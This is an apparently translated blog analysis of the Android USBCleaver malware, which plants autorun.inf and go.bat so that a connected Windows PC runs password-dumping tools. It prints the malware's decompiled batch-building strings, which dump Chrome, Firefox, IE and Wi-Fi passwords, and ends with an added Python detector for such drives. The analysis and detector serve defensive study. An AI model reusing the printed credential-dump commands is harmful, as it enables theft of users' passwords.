This article was written by Jack_Jia. Please credit the source when reposting.
Article link: http://blog.csdn.net/jiazhijun/article/details/9179749
Author: Jack_Jia Email: [email protected]
I. Basic information about the virus sample
II. Analysis of the malicious code
1. Inspecting the AndroidManifest.xml file
The manifest shows that this malware has only one entry point: .USBCleaverActivity.
2. Code analysis workflow
The code tree structure is as follows:
Analysis of the program's single entry point gives the following workflow for the malicious code:
1. Tapping the app icon starts the USBCleaverActivity component, which is responsible for setting up the runtime environment the virus needs, such as its directory structure. Through payloadHandler it writes the autorun.inf file (when the handset is connected to a PC as a USB drive, the PC runs go.bat according to that file's configuration), and through downloader it fetches the PC trojan.
2. The downloader class downloads the PC trojan archive; once downloaded, decompress unpacks it.
Information about the downloaded PC trojan archive is as follows:
3. The payload generates go.bat through payloadHandler, and autorun.inf is configured to run go.bat.
```java
public String dumpChromePassword() {
    this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump Chrome PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpChromePassword;
}

public String dumpFFPassword() {
    this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho + [Dump Firefox PW] + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpFFPassword;
}

public String dumpIEPassword() {
    this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump IE PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpIEPassword;
}

public String dumpSysInfo() {
    this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [System info] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";
    return this.dumpSysInfo;
}

public String dumpWifiPassword() {
    this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump WIFI PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpWifiPassword;
}
```
The content of go.bat is what runs the downloaded PC trojan. At this point the runtime environment for the PC-side trojan is fully set up: once the handset is connected to a PC in USB mass-storage mode, the PC trojan can run.
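As an added example (not code from the original post or from the malware), the following Python script shows how a defender can triage a removable drive for the two artifacts described above: an autorun.inf that launches a script, and a batch file that calls the password-dumping tools named in the decompiled strings and redirects their /stext output into a log. The autorun.inf body is an assumption (the post does not show it); the go.bat fragment is constructed from the dump* strings on the page.

```python
import configparser
from typing import Dict, List

# Constructed sample: an autorun.inf of the shape payloadHandler is said to
# write. The real file body is not shown on the page, so this is assumed.
SAMPLE_AUTORUN_INF = """[autorun]
open=go.bat
action=Open folder to view files
icon=folder.ico
"""

# Constructed sample: a go.bat fragment assembled from the decompiled
# dumpChromePassword / dumpSysInfo strings shown above.
SAMPLE_GO_BAT = (
    "ECHO + [Dump Chrome PW] + >> %log% 2>&1\r\n"
    ".\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\n"
    "COPY %log%+%tmplog%* %log% >> NUL\r\n"
    "DEL /f /q %tmplog% >NUL\r\n"
    "IPCONFIG /all >> %log% 2>&1\r\n"
)

# Benign autorun.inf that only sets a drive icon and label: no launch keys.
BENIGN_AUTORUN_INF = "[autorun]\nicon=drive.ico\nlabel=My Drive\n"

# Credential-dump utilities named in the decompiled payload (file names only).
DUMP_TOOLS = ("chromepass.exe", "passwordfox.exe", "iepv.exe", "wirelesskeyview.exe")

# Extensions that mean an autorun key launches code rather than opening a folder.
EXEC_EXTENSIONS = (".bat", ".cmd", ".exe", ".vbs", ".scr")


def autorun_findings(inf_text: str) -> List[str]:
    """Return indicators found in an autorun.inf body (empty list if none)."""
    findings: List[str] = []
    # interpolation=None so '%' in values does not trip the parser;
    # strict=False tolerates duplicated keys seen in hand-written INF files.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(inf_text)
    if not cp.has_section("autorun"):
        return findings
    for key, value in cp.items("autorun"):
        # configparser lowercases keys; 'shell\<verb>\command' keys also launch code.
        if key in ("open", "shellexecute") or key.endswith("\\command"):
            target = value.strip().lower()
            if target.endswith(EXEC_EXTENSIONS):
                findings.append(f"autorun.inf {key}={target} launches an executable")
    return findings


def batch_findings(bat_text: str) -> List[str]:
    """Flag batch lines that invoke known dump tools or redirect /stext output."""
    findings: List[str] = []
    for lineno, line in enumerate(bat_text.splitlines(), 1):
        low = line.lower()
        for tool in DUMP_TOOLS:
            if tool in low:
                findings.append(f"line {lineno}: invokes {tool}")
        if "/stext" in low and ">>" in low:
            findings.append(f"line {lineno}: saves tool output to a file (/stext redirected)")
    return findings


def assess_removable_media(inf_text: str, bat_text: str) -> Dict[str, object]:
    """Combine both checks into one verdict for a mounted drive."""
    inf = autorun_findings(inf_text)
    bat = batch_findings(bat_text)
    # Both an auto-launch hook and a credential-dump script is the USBCleaver pattern.
    verdict = "suspicious" if inf and bat else ("review" if inf or bat else "clean")
    return {"verdict": verdict, "autorun": inf, "batch": bat}


if __name__ == "__main__":
    result = assess_removable_media(SAMPLE_AUTORUN_INF, SAMPLE_GO_BAT)
    print(result["verdict"])
    for item in result["autorun"] + result["batch"]:
        print(" -", item)
```

On a live system the two strings would be read from the root of the mounted drive. Note that Windows has ignored autorun.inf on USB mass-storage devices since the 2011 AutoRun update, so the launch hook only works on unpatched or legacy hosts; the batch file and the NirSoft-style tools next to it are still worth flagging because a user can double-click go.bat by hand.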
V. Related links
http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99
http://news.ccidnet.com/art/1032/20130625/5029495_1.html